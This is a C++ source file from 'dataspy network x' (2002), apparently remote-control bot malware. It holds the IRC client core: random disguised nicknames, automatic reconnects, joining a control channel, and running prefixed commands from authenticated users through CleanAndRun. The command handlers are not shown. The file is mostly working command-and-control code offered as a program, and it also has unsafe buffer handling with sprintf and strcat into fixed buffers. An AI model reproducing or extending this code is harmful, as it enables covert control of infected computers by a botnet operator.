 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	MainBot.cpp - All our IRC bot functions & classes

	Last revised : 31st March 2002

  */


#include <windows.h>
#include <stdio.h>
#include <winsock.h>
#include "../include/dsnxsockets.h"
#include "../include/mainbot.h"
#include "../include/Clinkedlists.h"
#include "../include/commands.h"
#include "../include/dsnxsockets.h"
#include "../include/dsnxsockets.h"
#include "../include/nickDb.h"
#include "../include/tcp.h"
#include "../include/settingstorage.h"
#include "../include/staticcommands.h"
#include "../include/shared.h"

#include "../include/auth.h"

int iMaxNickLen = 9;

void MainBot::NewNick() {

	char *cNick,*cSend;

	unique_nick_id = LOWORD(rand());

	cNick = GetNick(TRUE,unique_nick_id,MAX_NICK_LEN);

	cSend = new char[strlen(cNick) + 8];
	
	sprintf(cSend,"NICK %s",cNick);

	strcpy(my_nick,cNick);

	send_server_msg(cSend,s);

	delete cSend;
	delete cNick;

}

MainBot::MainBot(char *server,char* channel,USHORT port) : DSNXSocket(server,port) {

	
	cChannel = new char [strlen(channel) + 1];
	strcpy(cChannel,channel);

	bBeenOnline = FALSE;
	connection_retries  =0;
	auth = 0;
	wUniqueID = MainBot_ID;

	Kill(0); /* As the socket is closed, lets open it :D */

}

MainBot::~MainBot () {

	if (cChannel)
		delete cChannel;

	while (auth) {
		CLinkedList *del = auth->Get (1);
		del->Remove(&auth);
		delete del;
	}

}

/* what happens when the socket were on is closed */

DWORD MainBot::Kill(LPVOID params) {

	if (bStopUse || connection_retries >= MAX_RETRIES) {

		bStopUse= true;
		delete this;
		return 0;

	} else {

		connection_retries++;

		if (( s = SmartConnect(cServer , iPort , bBeenOnline ? DEFAULT_CONNECT_TIME : FIRST_CONNEC_TIME ) )== INVALID_SOCKET ) {

			Kill(0);
			return 0;
		
		} else {

			char *delete_me[5];
			DWORD tid;	
			USHORT total=0,count=4,ID = rand();

			while (count-- > 0 ) {

				delete_me[count] = GetNick(FALSE,ID + count , MAX_NICK_LEN);
				total += strlen(delete_me[count]);
			}

			delete_me[4] = new char[32 + total];

			sprintf(delete_me[4],"USER %s %s %s :%s",delete_me[2],delete_me[3],delete_me[1],delete_me[0]);
			send_server_msg(delete_me[4],s);
			count = 5;
			while (count -- > 0 )
				delete delete_me[count];

			NewNick();
				
			CreateThread(NULL,0,(DWORD(__stdcall *)(void *))DSNXReceiveLoop,(LPVOID)this,0,&tid);

			return 0;
		}
	}
}

DWORD MainBot::Dome(LPVOID params) {
	
	char *recv_buf,*in,*f;

	int dLen = 0;

	if((dLen = TCPRecv(s,&recv_buf)) <= 0)
		return -1;

	recv_buf[dLen] = 0;
	f=recv_buf;

	while (1) {

		in = recv_buf;

		recv_buf = strchr(in,'\r');

		if (recv_buf)
			*(recv_buf++) =0;
		else
			break;

		if (*recv_buf == '\n')
			*(recv_buf++) =0;
		else
			break;


		if (!strnicmp(in, "PING :",6)) { /* reply to the ping command */
			char rep[64];
			in[1] += 6;
			sprintf(rep,"%s",in);
			send_server_msg(rep,s);
		}
		/*

			Else its not a PING/PONG message, its in the format:

			:FROM TYPE WHERE :MSG

			eg:
				:irc.dataspy.net NOTICE AUTH :*** Looking up your hostname...
				:irc.dataspy.net 001 ds :Welcome to the the irc server
				:irc.dataspy.net 005 ds MAP KNOCK SAFELIST HCN WALLCHOPS WATCH=128 SILENCE=5 MODES=13 MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=ohvbeqa,k,lfL,psmntirRcOAQKVHGCuzN NETWORK=ROXnet :are supported by this server
				:ds MODE ds :+wx
				:ds!a@32556C58.1E858827.4A1388ED.IP JOIN :#cool
				:abc!common@32556C58.1E858827.4A1388ED.IP JOIN :#cool
				:abc!common@32556C58.1E858827.4A1388ED.IP PRIVMSG #cool :hi
				:abc!common@32556C58.1E858827.4A1388ED.IP NOTICE ds :hi
		*/
		else
		{
			char *from,*type,*where,*msg,*host;
			short auth_lvl=0;
			BOOL bFromServer = FALSE,bNoText=FALSE;

			if (*in == ':')
				in++;

			if (*in == 0)
				continue;

			from = in;
			host = strchr(from,'!');
			type = strchr(from,' ');

			if (!host || !type || type < host) { /* is from the server */

				bFromServer= TRUE;

			} else { /* must be from a client connected to the server */

				*(host++) = 0;

				type = strchr(host,' ');

			}

			if (!type)
				continue;

			*(type++) =0;

			where = strchr(type,' ');

			if (!where)
				continue;

			*(where++) = 0;

			msg = strchr(where,' ');

			if (!msg) {
				bNoText = TRUE;
			} else {
				*(msg++) =0;
				msg++;
			}

			if (bFromServer) {

				switch(atoi(type)){
					case (1): //Welcome to da network d00d
						{
							char *r = new char[strlen(cChannel) + 16];

							bBeenOnline = TRUE;

							sprintf(r,"JOIN %s",cChannel);
							send_server_msg(r,s);
							delete r;
						}
					break;
/*
					case (101): //Uh network redirect - freedumb
					{	
							MainBot *redirect = new MainBot(cChannel,0,0);

							redirect->Insert(&g_IOList);
							
						}
					break;
*/
					case (333): //#define RPL_TOPICWHOTIME
						{
							char *u = strrchr(msg,' ');
							//if (!strnicmp(msg,bot->cInfo,strlen(bot->cInfo)) && u)
							if (u)
									this->unique = atoi(u);

						}
						break;
					case (432): //Erronous chars in nick
					case (433): //Nickname is already in use
					//case (437): //ERR_BANNICKCHANGE
								NewNick();
				}
				continue;
			}
			else
			{
				if (!stricmp(type,"topic"))	{

					char *d = new char[strlen(where) + 16];
					sprintf(d,"topic %s",where);
					send_server_msg(d,s);
					delete d;
				}
				/* from a client connected to the server */
				auth_lvl = Validate(from,host,auth);

				if (!bNoText) {//strnicmp(type,"privmsg",7)) { /* a msg from a client to process */

					if (auth_lvl != -1) {
						char *prfx = GetSetting("PRFX");

						if (prfx) {

							if (strnicmp(msg ,prfx,strlen(prfx)) )	{
								continue;        //No prefix
							}

							msg+= strlen(prfx); /* remove the owners prefix */
						}

						if (*msg)
							CleanAndRun(msg,from,host,where,this,auth_lvl);
					}
				}
				else
				{
					/*

						:nick!hostmask JOIN :#cool
						:nick!hostmask PART #cool
						:nick!hostmask QUIT :no
						:nick!hostmask NICK :asdsa

					*/
					if(	!stricmp(type,"quit") ||
						!stricmp(type,"nick") ||
						!stricmp(type,"part") ||
						!stricmp(type,"join") ) {

						if (auth_lvl == -1 || auth_lvl > 0)
							IRCLogout(from,&auth);
					}

				} /* is privmsg? */

			} /* bFromServer */

		} /*  ping else */

	} /* while(1) */

	free(f);
	return 0;
}

char bold[] = "\x02"; // \x30\x2C\x34\0"; Bold
char norm[] = ""; // x03\x38\x2C\x32\0";  Normal

#define r_CHANNEL 'c'
#define r_QUERY 'q'
#define r_NOTICE 'n'

void MainBot::SendIRCMessage(char*message,char*to,char*where,BOOL bError) {

	char tmp[2048],*rptc = GetSetting("rptc");

	if (!rptc)
		rptc = "c";

	if (tolower(*rptc) == r_CHANNEL && (*where == '#' || *where == '&') ) {

		sprintf(tmp,"privmsg %s %c%c%*s-%s",where,bError?':':' ',bError?02:':',MAX_NICK_LEN - strlen(my_nick) + strlen(to) , to ,message);

	}
	else if (tolower(*rptc) == r_NOTICE)
	{
		sprintf(tmp,"notice %s %c%c%*s",to,bError?':':' ',bError?02:':',MAX_NICK_LEN - strlen(my_nick) + strlen(message),message);
	}
	else
	{
		sprintf(tmp,"privmsg %s %c%c%s",to,bError?':':' ',bError?02:':',message);
	}

	send_server_msg(tmp,s);
}

void send_server_msg(char *msg,SOCKET s) {

	strcat(msg,"\n");
	TCPSend(s,msg,strlen(msg));
	//TCPSend(bot->iSocketID,"\r\n\0",3);
}
